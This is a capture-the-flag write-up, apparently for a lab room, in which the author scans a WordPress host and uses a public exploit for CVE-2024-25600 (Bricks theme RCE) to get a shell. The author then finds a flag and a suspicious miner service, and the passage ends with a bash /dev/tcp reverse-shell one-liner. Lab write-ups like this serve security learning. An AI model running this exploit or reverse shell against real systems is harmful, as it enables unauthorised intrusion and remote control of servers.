From Three Million Bricks to Three Million Transactions!
Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they’ve lost access.
Can you hack back the server and identify what happened there?
Note: Add 10.10.18.83 bricks.thm to your /etc/hosts file.
Questions
Question 01
What is the content of the hidden .txt file in the web folder?
Recon
┌──(0xneobyte㉿0xNeoShell)-[~]
└─$ rustscan -a 10.10.18.83 --ulimit 5000 -- -Pn -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.
[~] The config file is expected to be at "/home/0xneobyte/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.18.83:22
Open 10.10.18.83:80
Open 10.10.18.83:443
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -Pn -sC -sV" on ip 10.10.18.83
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-26 13:40 +0530
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:40
Completed Parallel DNS resolution of 1 host. at 13:40, 1.48s elapsed
DNS resolution of 1 IPs took 1.48s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:40
Scanning 10.10.18.83 [3 ports]
Discovered open port 443/tcp on 10.10.18.83
Discovered open port 22/tcp on 10.10.18.83
Discovered open port 80/tcp on 10.10.18.83
Completed SYN Stealth Scan at 13:40, 0.22s elapsed (3 total ports)
Initiating Service scan at 13:40
Scanning 3 services on 10.10.18.83
Completed Service scan at 13:40, 18.91s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.18.83.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:41, 8.95s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:41
Completed NSE at 13:41, 2.53s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:41
Completed NSE at 13:41, 0.00s elapsed
Nmap scan report for 10.10.18.83
Host is up, received user-set (0.20s latency).
Scanned at 2025-02-26 13:40:39 +0530 for 30s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6b:b2:d7:43:62:71:23:9b:1f:df:63:ec:63:7e:88:e3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnPPB0kMxIYsYOuqcQZDfWI6lZDC1ssYif1omBs9Fv/E5xLB8YasJ5LRGwN7sJqtQVeh80iho4DnpPr9nRJUsZWEvY+0IEs04Wx6Yj1IFLqYGbHYdTfC3SmESAaka4HLYwDk5x06JqtxGnE8oYBXAgpR/JvNKrsAgI+Xb0PZGEH9hhUZdYg5NoDg9Kp+taVn7964f+OZSTxMMIPBTPOjGDtObZwFRWx0podmNNkQyoHS59ZPVOuCmE8gHvGzXz0UaszlDAo0DT5plYKmivqZy4tipNJ5V38U/Ez+uksqiTIkFUhW2TOL0rXem7O7Vr7E2sO+gnEm3FzDvpO8os8LD2lY0NuP5ku1JVDkOSakGq43LNgCXX7G9fzqr4UbtWHuf7xF8PxMc10uzGJAPgpg1t48Ipi3/bZuvFXKAwsUPyOECg5z25nQnL5juQZseoPJjEetrinoyDR5Frj+iovMT5Nlzes6vmXKhJlLBSfNUdls6sD3oIIoVnp+wrG/4Zo9M=
| 256 a5:c0:8d:c1:73:fe:8d:cc:b5:7a:16:63:63:12:42:98 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGBdYHnPCRJOT2032Fyq5TCyQIjEQg4WZiVF/sPEI6+a8TuKLS1mqOfi+AijsrskcjpPnsoz7VEPDYldxRss0hE=
| 256 8c:76:63:28:e4:3a:04:10:4f:8e:67:f9:5b:c0:27:dd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIElMNAW6p7O2ck5To/C00G3XXcuznsRvJF/iUN9NH8fs
80/tcp open http syn-ack ttl 63 Python http.server 3.5 - 3.10
|_http-server-header: WebSockify Python/3.8.10
|_http-title: Error response
443/tcp open ssl/http syn-ack ttl 63 Apache httpd
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-04-02T11:59:14
| Not valid after: 2025-04-02T11:59:14
| MD5: f1df:99bc:d5ab:5a5a:5709:5099:4add:a385
| SHA-1: 1f26:54bb:e2c5:b4a1:1f62:5ea0:af00:0261:35da:23c3
| -----BEGIN CERTIFICATE-----
| MIIDazCCAlOgAwIBAgIUPbOGG+Xi6dsd8rNRzG/wI3DvA8MwDQYJKoZIhvcNAQEL
| BQAwRTELMAkGA1UEBhMCVVMxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
| GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yNDA0MDIxMTU5MTRaFw0yNTA0
| MDIxMTU5MTRaMEUxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
| HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQCtzw+eboW61zIzd/tl7LdrZCO86nc/MN0DkZfTngO7
| lJq/VQgR617FfExm26yI+wZSEkUWO5dg+1BYJbkYlayzr0Dyor3E2l73dIsM2Ur4
| s6hET6gYFD8pCu9z6YvMqxcq/1YWN+pOGsicAFeT6t8uQBYyA9NZZXSAISnorUbV
| aRW/Z8cwijQquIfwIiBaVhOnqBAqoudHQ5yLb461PGgVpioNeS9DDe3I7+J5LPe7
| va5wcnTJ2xfKrCHIPipuAgj5lCJ7lihlvT0KDB1elFxy5yIPABR5MthRs36eiO4+
| 1AKfPDVrvC5IpBvycgT95qhR0AnS+N9CwmO4HUWq5AJtAgMBAAGjUzBRMB0GA1Ud
| DgQWBBQHb6dwgvFLizbay0+nIgxlfzZYtjAfBgNVHSMEGDAWgBQHb6dwgvFLizba
| y0+nIgxlfzZYtjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBJ
| gjQinsS5AIb/LJT4KVhHgDAVezICOx3kg6foyMV3z6CcU9e6QLuMpyMCR/UGqUqs
| m0iJH8sR1jJdS3tDPTEmJXW8gBux3Y4xl9/A1sMhm97O5O7KHiBiwiW47Pwfo4/a
| wchcSEcU/4jfivY7ifGcIBSN4GInUHjwfD63J0/LHh1GPEo/Wsoekk0586psicaV
| dv3UqrFcLFztwKGDgs+51Oc9a70xT96bko0huCZ1NFOh4zchZ3kno9mueURi/SJO
| ibgwFMBWO7mQHKnlnQxxQwxER+QyftgnO+gXvkPGQU+o4rMnjHX5EAjyfoutRjjN
| tQWUR7AJRMC+3VGdRcVV
|_-----END CERTIFICATE-----
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Brick by Brick
|_http-server-header: Apache
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:41
Completed NSE at 13:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:41
Completed NSE at 13:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:41
Completed NSE at 13:41, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.48 seconds
Raw packets sent: 3 (132B) | Rcvd: 224 (8.972KB)so its basically a wordpress site, when i inspect the source code its using theme bricks, so the room name also bricks so thats something SUS
<script src="https://bricks.thm/wp-content/themes/bricks/assets/js/bricks.min.js?ver=1705030332" id="bricks-scripts-js"></script>so im gonna scan this with wpscan and look into more info :
┌──(0xneobyte㉿0xNeoShell)-[~]
└─$ wpscan --url https://bricks.thm --disable-tls-checks
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: https://bricks.thm/ [10.10.18.83]
[+] Started: Wed Feb 26 14:20:03 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: server: Apache
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: https://bricks.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://bricks.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: https://bricks.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://bricks.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.5 identified (Insecure, released on 2024-04-02).
| Found By: Rss Generator (Passive Detection)
| - https://bricks.thm/feed/, <generator>https://wordpress.org/?v=6.5</generator>
| - https://bricks.thm/comments/feed/, <generator>https://wordpress.org/?v=6.5</generator>
[+] WordPress theme in use: bricks
| Location: https://bricks.thm/wp-content/themes/bricks/
| Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
| Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
| Style Name: Bricks
| Style URI: https://bricksbuilder.io/
| Description: Visual website builder for WordPress....
| Author: Bricks
| Author URI: https://bricksbuilder.io/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.9.5 (80% confidence)
| Found By: Style (Passive Detection)
| - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:10 <=====================================> (137 / 137) 100.00% Time: 00:00:10
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 26 14:20:28 2025
[+] Requests Done: 170
[+] Cached Requests: 7
[+] Data Sent: 42.345 KB
[+] Data Received: 110.502 KB
[+] Memory used: 271.395 MB
[+] Elapsed time: 00:00:25and yeah we found the version or brick theme used in the website, so i googled “wordpress bricks Version: 1.9.5 vuln”
and i found a github repo : https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
Exploit :
CVE-2024-25600 - WordPress Bricks Builder Remote Code Execution (RCE) 🌐
The Bricks theme for WordPress has been identified as vulnerable to a critical security flaw known as CVE-2024-25600. This vulnerability affects all versions up to, and including, 1.9.6 of the Bricks Builder plugin. It poses a significant risk as it allows unauthenticated attackers to execute arbitrary code remotely on the server hosting the vulnerable WordPress site. CVE-2024-25600 is classified under Remote Code Execution (RCE) vulnerabilities, enabling attackers to manipulate the server into executing malicious code without any authentication. This vulnerability exploits a flaw in the Bricks Builder plugin’s handling of user input, allowing attackers to inject and execute PHP code remotely. The exploitation of this vulnerability can lead to full site compromise, data theft, and potential spreading of malware to site visitors.
Impact ⚠️
The impact of CVE-2024-25600 is severe due to several factors:
- Unauthenticated Access: The exploit can be carried out without any authenticated session or user credentials, making every website running a vulnerable version of the Bricks Builder plugin an easy target.
- Remote Code Execution: Successful exploitation allows attackers to execute arbitrary code on the server, providing the capability to modify website content, steal sensitive data, and gain unauthorized access to the hosting environment.
- Widespread Risk: Given the popularity of the Bricks Builder plugin among WordPress users for its design flexibility, a significant number of websites are at risk until patched.
Mitigation Steps 🔒
To mitigate the risk posed by CVE-2024-25600, website administrators and security teams should immediately take the following steps:
- Update the Plugin: Upgrade the Bricks Builder plugin to the latest version immediately. The developers have released patches addressing this vulnerability in versions following 1.9.6.
- Security Review: Conduct a thorough security review of your website to ensure no unauthorized modifications have been made.
- Regular Monitoring: Implement regular monitoring of web logs for any suspicious activity that could indicate exploitation attempts or successful breaches.
- Security Best Practices: Adhere to security best practices for WordPress sites, including using strong passwords, limiting login attempts, and using security plugins to monitor and protect your site.
Disclaimer 🚫
Here’s a Proof of Concept (PoC) for educational and security research purposes only. The use of the information provided is at your own risk. The author or contributors do not encourage unethical or illegal activity. Ensure you have explicit permission before testing any system with the techniques and code described.
to run this we need to install the dependencies :
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install alive-progress
Collecting alive-progress
Downloading alive_progress-3.2.0-py3-none-any.whl.metadata (70 kB)
Collecting about-time==4.2.1 (from alive-progress)
Downloading about_time-4.2.1-py3-none-any.whl.metadata (13 kB)
Collecting grapheme==0.6.0 (from alive-progress)
Downloading grapheme-0.6.0.tar.gz (207 kB)
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Downloading alive_progress-3.2.0-py3-none-any.whl (77 kB)
Downloading about_time-4.2.1-py3-none-any.whl (13 kB)
Building wheels for collected packages: grapheme
Building wheel for grapheme (pyproject.toml) ... done
Created wheel for grapheme: filename=grapheme-0.6.0-py3-none-any.whl size=210137 sha256=8cb63f0205c6694df52ddcb8a3c665f2e7e7404c3480ba26db8df3ac3c5c2aeb
Stored in directory: /home/0xneobyte/.cache/pip/wheels/e0/96/66/ab223d7755e401981953430b7f2d562afba01a71296a74c893
Successfully built grapheme
Installing collected packages: grapheme, about-time, alive-progress
Successfully installed about-time-4.2.1 alive-progress-3.2.0 grapheme-0.6.0
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ ls
CVE-2024-25600.py myenv README.md
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ python CVE-2024-25600.py
/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py:18: SyntaxWarning: invalid escape sequence '\ '
color.print("""[yellow]
Traceback (most recent call last):
File "/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py", line 4, in <module>
import requests
ModuleNotFoundError: No module named 'requests'
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install requests
Collecting requests
Downloading requests-2.32.3-py3-none-any.whl.metadata (4.6 kB)
Collecting charset-normalizer<4,>=2 (from requests)
Downloading charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl.metadata (35 kB)
Collecting idna<4,>=2.5 (from requests)
Downloading idna-3.10-py3-none-any.whl.metadata (10 kB)
Collecting urllib3<3,>=1.21.1 (from requests)
Downloading urllib3-2.3.0-py3-none-any.whl.metadata (6.5 kB)
Collecting certifi>=2017.4.17 (from requests)
Downloading certifi-2025.1.31-py3-none-any.whl.metadata (2.5 kB)
Downloading requests-2.32.3-py3-none-any.whl (64 kB)
Downloading certifi-2025.1.31-py3-none-any.whl (166 kB)
Downloading charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl (140 kB)
Downloading idna-3.10-py3-none-any.whl (70 kB)
Downloading urllib3-2.3.0-py3-none-any.whl (128 kB)
Installing collected packages: urllib3, idna, charset-normalizer, certifi, requests
Successfully installed certifi-2025.1.31 charset-normalizer-3.4.1 idna-3.10 requests-2.32.3 urllib3-2.3.0
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ ping 10.10.152.127
PING 10.10.152.127 (10.10.152.127) 56(84) bytes of data.
64 bytes from 10.10.152.127: icmp_seq=1 ttl=63 time=221 ms
^C
--- 10.10.152.127 ping statistics ---
2 packets transmitted, 1 received, 50% packet loss, time 1002ms
rtt min/avg/max/mdev = 220.662/220.662/220.662/0.000 ms
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ sudo nano /etc/hosts
[sudo] password for 0xneobyte:
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ ls
CVE-2024-25600.py myenv README.md
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ python CVE-2024-25600.py
/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py:18: SyntaxWarning: invalid escape sequence '\ '
color.print("""[yellow]
Traceback (most recent call last):
File "/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py", line 7, in <module>
from bs4 import BeautifulSoup
ModuleNotFoundError: No module named 'bs4'
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install bs4
Collecting bs4
Downloading bs4-0.0.2-py2.py3-none-any.whl.metadata (411 bytes)
Collecting beautifulsoup4 (from bs4)
Downloading beautifulsoup4-4.13.3-py3-none-any.whl.metadata (3.8 kB)
Collecting soupsieve>1.2 (from beautifulsoup4->bs4)
Downloading soupsieve-2.6-py3-none-any.whl.metadata (4.6 kB)
Collecting typing-extensions>=4.0.0 (from beautifulsoup4->bs4)
Downloading typing_extensions-4.12.2-py3-none-any.whl.metadata (3.0 kB)
Downloading bs4-0.0.2-py2.py3-none-any.whl (1.2 kB)
Downloading beautifulsoup4-4.13.3-py3-none-any.whl (186 kB)
Downloading soupsieve-2.6-py3-none-any.whl (36 kB)
Downloading typing_extensions-4.12.2-py3-none-any.whl (37 kB)
Installing collected packages: typing-extensions, soupsieve, beautifulsoup4, bs4
Successfully installed beautifulsoup4-4.13.3 bs4-0.0.2 soupsieve-2.6 typing-extensions-4.12.2
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install bs4
Requirement already satisfied: bs4 in ./myenv/lib/python3.13/site-packages (0.0.2)
Requirement already satisfied: beautifulsoup4 in ./myenv/lib/python3.13/site-packages (from bs4) (4.13.3)
Requirement already satisfied: soupsieve>1.2 in ./myenv/lib/python3.13/site-packages (from beautifulsoup4->bs4) (2.6)
Requirement already satisfied: typing-extensions>=4.0.0 in ./myenv/lib/python3.13/site-packages (from beautifulsoup4->bs4) (4.12.2)
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ python CVE-2024-25600.py
/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py:18: SyntaxWarning: invalid escape sequence '\ '
color.print("""[yellow]
Traceback (most recent call last):
File "/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py", line 8, in <module>
from rich.console import Console
ModuleNotFoundError: No module named 'rich'
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install rich
Collecting rich
Downloading rich-13.9.4-py3-none-any.whl.metadata (18 kB)
Collecting markdown-it-py>=2.2.0 (from rich)
Downloading markdown_it_py-3.0.0-py3-none-any.whl.metadata (6.9 kB)
Collecting pygments<3.0.0,>=2.13.0 (from rich)
Downloading pygments-2.19.1-py3-none-any.whl.metadata (2.5 kB)
Collecting mdurl~=0.1 (from markdown-it-py>=2.2.0->rich)
Downloading mdurl-0.1.2-py3-none-any.whl.metadata (1.6 kB)
Downloading rich-13.9.4-py3-none-any.whl (242 kB)
Downloading markdown_it_py-3.0.0-py3-none-any.whl (87 kB)
Downloading pygments-2.19.1-py3-none-any.whl (1.2 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 MB 1.2 MB/s eta 0:00:00
Downloading mdurl-0.1.2-py3-none-any.whl (10.0 kB)
Installing collected packages: pygments, mdurl, markdown-it-py, rich
Successfully installed markdown-it-py-3.0.0 mdurl-0.1.2 pygments-2.19.1 rich-13.9.4
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ python CVE-2024-25600.py
/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py:18: SyntaxWarning: invalid escape sequence '\ '
color.print("""[yellow]
Traceback (most recent call last):
File "/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py", line 9, in <module>
from prompt_toolkit import PromptSession, HTML
ModuleNotFoundError: No module named 'prompt_toolkit'
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install prompt_toolkit
Collecting prompt_toolkit
Downloading prompt_toolkit-3.0.50-py3-none-any.whl.metadata (6.6 kB)
Collecting wcwidth (from prompt_toolkit)
Downloading wcwidth-0.2.13-py2.py3-none-any.whl.metadata (14 kB)
Downloading prompt_toolkit-3.0.50-py3-none-any.whl (387 kB)
Downloading wcwidth-0.2.13-py2.py3-none-any.whl (34 kB)
Installing collected packages: wcwidth, prompt_toolkit
Successfully installed prompt_toolkit-3.0.50 wcwidth-0.2.13For the first flag here it is :
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ python CVE-2024-25600.py -u https://bricks.thm
/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py:18: SyntaxWarning: invalid escape sequence '\ '
color.print("""[yellow]
_______ ________ ___ ____ ___ __ __ ___ ___________ ____ ____
/ ____/ | / / ____/ |__ \ / __ \__ \/ // / |__ \ / ____/ ___// __ \/ __ \
/ / | | / / __/________/ // / / /_/ / // /_________/ //___ \/ __ \/ / / / / / /
/ /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/ __/____/ / /_/ / /_/ / /_/ /
\____/ |___/_____/ /____/\____/____/ /_/ /____/_____/\____/\____/\____/
Coded By: K3ysTr0K3R --> Hello, Friend!
[*] Checking if the target is vulnerable
[+] The target is vulnerable
[*] Initiating exploit against: https://bricks.thm
[*] Initiating interactive shell
[+] Interactive shell opened successfully
Shell> pwd
/data/www/default
Shell> ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
Shell> head 650c844110baced87e1606453b93f22a.txt
THM{fl46_650c844110baced87e1606453b93f22a}Question 02
What is the name of the suspicious process?
Shell> systemctl list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
apparmor.service loaded active exited Load AppArmor profiles
apport.service loaded active exited LSB: automatic crash report generation
atd.service loaded active running Deferred execution scheduler
avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack
badr.service loaded active running My startup script
blk-availability.service loaded active exited Availability of block devices
cloud-config.service loaded active exited Apply the settings specified in cloud-config
cloud-final.service loaded active exited Execute cloud user/final scripts
cloud-init-local.service loaded active exited Initial cloud-init job (pre-networking)
cloud-init.service loaded active exited Initial cloud-init job (metadata service crawler)
console-setup.service loaded active exited Set console font and keymap
cron.service loaded active running Regular background program processing daemon
cups-browsed.service loaded active running Make remote CUPS printers available locally
cups.service loaded active running CUPS Scheduler
dbus.service loaded active running D-Bus System Message Bus
finalrd.service loaded active exited Create final runtime dir for shutdown pivot root
getty@tty1.service loaded active running Getty on tty1
hddtemp.service loaded active exited LSB: disk temperature monitoring daemon
httpd.service loaded active running LSB: starts Apache Web Server
ifupdown-pre.service loaded active exited Helper to synchronize boot up for ifupdown
irqbalance.service loaded active running irqbalance daemon
kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures
keyboard-setup.service loaded active exited Set the console keyboard layout
kmod-static-nodes.service loaded active exited Create list of static device nodes for the current kernel
lightdm.service loaded active running Light Display Manager
● logrotate.service loaded failed failed Rotate log files
lvm2-monitor.service loaded active exited Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling
ModemManager.service loaded active running Modem Manager
multipathd.service loaded active running Device-Mapper Multipath Device Controller
mysqld.service loaded active running LSB: start and stop MySQL
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
networking.service loaded active exited Raise network interfaces
NetworkManager-wait-online.service loaded active exited Network Manager Wait Online
NetworkManager.service loaded active running Network Manager
openvpn.service loaded active exited OpenVPN service
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service
serial-getty@ttyS0.service loaded active running Serial Getty on ttyS0
setvtrgb.service loaded active exited Set console scheme
snap.amazon-ssm-agent.amazon-ssm-agent.service loaded active running Service for snap application amazon-ssm-agent.amazon-ssm-agent
snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd
snapd.seeded.service loaded active exited Wait until snapd is fully seeded
snapd.service loaded active running Snap Daemon
ssh.service loaded active running OpenBSD Secure Shell server
switcheroo-control.service loaded active running Switcheroo Control Proxy service
systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-modules-load.service loaded active exited Load Kernel Modules
systemd-networkd-wait-online.service loaded active exited Wait for Network to be Configured
systemd-networkd.service loaded active running Network Service
systemd-random-seed.service loaded active exited Load/Save Random Seed
systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems
systemd-resolved.service loaded active running Network Name Resolution
systemd-sysctl.service loaded active exited Apply Kernel Variables
systemd-sysusers.service loaded active exited Create System Users
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev
systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories
systemd-udev-settle.service loaded active exited udev Wait for Complete Device Initialization
systemd-udev-trigger.service loaded active exited udev Coldplug all Devices
systemd-udevd.service loaded active running udev Kernel Device Manager
systemd-update-utmp.service loaded active exited Update UTMP about System Boot/Shutdown
systemd-user-sessions.service loaded active exited Permit User Sessions
ubuntu.service loaded active running TRYHACK3M
udisks2.service loaded active running Disk Manager
ufw.service loaded active exited Uncomplicated firewall
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
upower.service loaded active running Daemon for power management
user-runtime-dir@1000.service loaded active exited User Runtime Directory /run/user/1000
user-runtime-dir@114.service loaded active exited User Runtime Directory /run/user/114
user@1000.service loaded active running User Manager for UID 1000
user@114.service loaded active running User Manager for UID 114
whoopsie.service loaded active running crash report submission daemon
wpa_supplicant.service loaded active running WPA supplicant
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
78 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
Shell> systemctl cat ubuntu.service
# /etc/systemd/system/ubuntu.service
[Unit]
Description=TRYHACK3M
[Service]
Type=simple
ExecStart=/lib/NetworkManager/nm-inet-dialog
Restart=on-failure
[Install]
WantedBy=multi-user.targetso its : nm-inet-dialog
Question 03
What is the service name affiliated with the suspicious process?
- ubuntu.service
Question 04
What is the log file name of the miner instance?so lets first move to /lib/NetworkManager/ cuz thats where the suspicious process stored on. and see whats inside
we cant use cd on this exlpoited shell so im gonna get a reverse shell on this. first create a listner and run this on the exploited shell :
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1┌──(0xneobyte㉿0xNeoShell)-[~]
